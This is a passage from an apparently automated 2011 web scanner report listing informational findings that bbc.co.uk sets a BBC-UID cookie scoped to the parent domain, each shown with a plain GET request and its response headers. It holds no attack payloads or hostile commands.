2.26. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435274  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12435274

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12435274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:34 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12435274
Keep-Alive: timeout=4, max=196
Connection: close
Set-Cookie: BBC-UID=b45d45054eca633ab23c0bb571f69d7d4743c620802001c4644f1a8f2561bcfc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:34 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.27. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435550  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12435550

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12435550 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:34 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12435550
Keep-Alive: timeout=4, max=199
Connection: close
Set-Cookie: BBC-UID=344d15054eeae30a1ff08d1e615e8ec299879790705041b4c40f1947adb6316f0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:34 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.28. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435798  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12435798

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12435798 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:35 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12435798
Keep-Alive: timeout=4, max=200
Connection: close
Set-Cookie: BBC-UID=74ed85c5dedab32bbb97e76d210ef44c92b0d8604020d1b404ff29961f5e70270Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.29. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437440  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12437440

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12437440 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:35 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12437440
Keep-Alive: timeout=4, max=192
Connection: close
Set-Cookie: BBC-UID=b4edc5055e1ad33b419c8ef3310e2c17f2484c859030e144643f79e77206d66b0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.30. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437881  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12437881

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12437881 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:36 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12437881
Keep-Alive: timeout=4, max=187
Connection: close
Set-Cookie: BBC-UID=945db525fe2a233ceecca652c124cffe7b75b03de0b061f4e4ef54c668b08e3a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.31. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12437912

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12437912 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:36 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12437912
Keep-Alive: timeout=4, max=162
Connection: close
Set-Cookie: BBC-UID=a4dde545ae9a237ceeaca663d1bed0c7786e009440b0c1a4c4bf34b69810feda0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.32. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437922  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12437922

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12437922 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:37 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12437922
Keep-Alive: timeout=4, max=190
Connection: close
Set-Cookie: BBC-UID=b40d45853eba331d98bfd76261b5c179d77e845f90e02184544f1476c36a19ba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

2.33. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427513  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-south-asia-12427513

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-south-asia-12427513 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:38 GMT
Location: http://www.bbc.co.uk/news/world-south-asia-12427513
Keep-Alive: timeout=4, max=195
Connection: close
Set-Cookie: BBC-UID=241df5b5fe7ae39eebb759005107deaf48035439c0f0d194a4ffb9e6af4ed0d70Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:38 GMT; path=/; domain=bbc.co.uk;
Content-Length: 235

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-south-asia-1242
...[SNIP]...

2.34. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427518  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-south-asia-12427518

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-south-asia-12427518 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:39 GMT
Location: http://www.bbc.co.uk/news/world-south-asia-12427518
Keep-Alive: timeout=4, max=189
Connection: close
Set-Cookie: BBC-UID=547d35658e3a132f5f00af0b719ee8205cea6b9860b021f4f4ff7917ada6b1bf0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:39 GMT; path=/; domain=bbc.co.uk;
Content-Length: 235

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-south-asia-1242
...[SNIP]...

2.35. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12437087  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-south-asia-12437087

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-south-asia-12437087 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:39 GMT
Location: http://www.bbc.co.uk/news/world-south-asia-12437087
Keep-Alive: timeout=4, max=199
Connection: close
Set-Cookie: BBC-UID=44fd65353e9a838f787fa843f1a1b0f3b18b0311e0a061a4941f74f663eae94a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:39 GMT; path=/; domain=bbc.co.uk;
Content-Length: 235

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-south-asia-1243
...[SNIP]...

2.36. http://www.bbc.co.uk/go/rss/int/news/-/news/world-us-canada-12411274  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-us-canada-12411274

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-us-canada-12411274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:40 GMT
Location: http://www.bbc.co.uk/news/world-us-canada-12411274
Keep-Alive: timeout=4, max=191
Connection: close
Set-Cookie: BBC-UID=b4bd3545fefae4509ff12002b17db3040da33c4150f09134440fc907add6e15f0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 234

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-us-canada-12411
...[SNIP]...

2.37. http://www.bbc.co.uk/news/business-12434447  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434447

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/business-12434447 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=64bd35b5be1a2451bb6ac905c17515c4f5a62e8d605021c9db6b823df4bfa14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bd35b5be1a2451bb6ac905c17515c4f5a62e8d605021c9db6b823df4bfa14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.38. http://www.bbc.co.uk/news/business-12434453  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434453

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/business-12434453 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=702
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=241df5c5fecad461db9800b6d10078be2f9b53e5e05041094bfbb38feb74d29e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=241df5c5fecad461db9800b6d10078be2f9b53e5e05041094bfbb38feb74d29e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.39. http://www.bbc.co.uk/news/business-12435838  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12435838

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/business-12435838 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=728
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=842df5b5fe4a64112b081720f1e94d44da451b35c0c0919a44bbdac51bc1dc0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=842df5b5fe4a64112b081720f1e94d44da451b35c0c0919a44bbdac51bc1dc0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.40. http://www.bbc.co.uk/news/business-12437194  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12437194

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/business-12437194 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=788
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=84ed75851e1a84234b69db6e31e13e57fb1510d1a060210a14bb8ae4521cd4000Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84ed75851e1a84234b69db6e31e13e57fb1510d1a060210a14bb8ae4521cd4000Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.41. http://www.bbc.co.uk/news/education-12429152  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/education-12429152

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/education-12429152 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=765
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=44bd05d56ebaf4a33ba92238910beaabe4315fc1f040913a240b3ad4c15c429c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44bd05d56ebaf4a33ba92238910beaabe4315fc1f040913a240b3ad4c15c429c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.42. http://www.bbc.co.uk/news/entertainment-arts-12426999  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12426999

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/entertainment-arts-12426999 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=755
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=44dde5859e0a84331bd3568801b5efe625b6aa2e8020b199fb1b525adfd16f880Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44dde5859e0a84331bd3568801b5efe625b6aa2e8020b199fb1b525adfd16f880Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.43. http://www.bbc.co.uk/news/entertainment-arts-12427905  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12427905

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/entertainment-arts-12427905 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=b4dde595ae1a3473da406e9101b62f3e9b16bb6360c0e1e96b1b637287fdb99e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4dde595ae1a3473da406e9101b62f3e9b16bb6360c0e1e96b1b637287fdb99e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.44. http://www.bbc.co.uk/news/entertainment-arts-12428196  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12428196

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/entertainment-arts-12428196 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=34bdc5753e6a24c46af7bfd651ae74ab2d77c6f2906001eaf49b9aa5529115c40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34bdc5753e6a24c46af7bfd651ae74ab2d77c6f2906001eaf49b9aa5529115c40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.45. http://www.bbc.co.uk/news/health-12401970  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12401970

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

